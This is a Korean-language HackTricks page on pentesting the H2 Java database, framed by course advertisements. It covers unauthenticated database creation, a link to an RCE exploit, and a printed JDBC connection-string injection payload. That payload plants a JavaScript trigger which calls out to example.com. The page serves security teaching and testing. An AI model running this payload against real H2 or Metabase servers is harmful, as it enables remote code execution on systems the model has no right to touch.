H2 - Java SQL database

htARTE (HackTricks AWS Red Team Expert)를 통해 제로에서 히어로까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

공식 페이지: https://www.h2database.com/html/main.html

접근

유효하지 않은 자격 증명 없이 새 데이터베이스를 만들기 위해 존재하지 않는 데이터베이스 이름을 지정할 수 있습니다 (인증되지 않음):

또는 예를 들어 mysql이 실행 중이고 해당 데이터베이스의 데이터베이스 이름자격 증명을 알고 있다면 해당 데이터베이스에 바로 액세스할 수 있습니다:

HTB의 Hawk 상자에서의 트릭.

RCE

H2 데이터베이스와 통신할 수 있는 액세스가 있는 경우 RCE을 얻기 위한 이 exploit을 확인하세요: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

H2 SQL Injection to RCE

이 게시물에서 SQL Injection을 악용하여 H2 데이터베이스를 통한 RCE를 얻는 페이로드가 설명되어 있습니다.

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
제로부터 영웅이 될 때까지 AWS 해킹 배우기 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

Last updated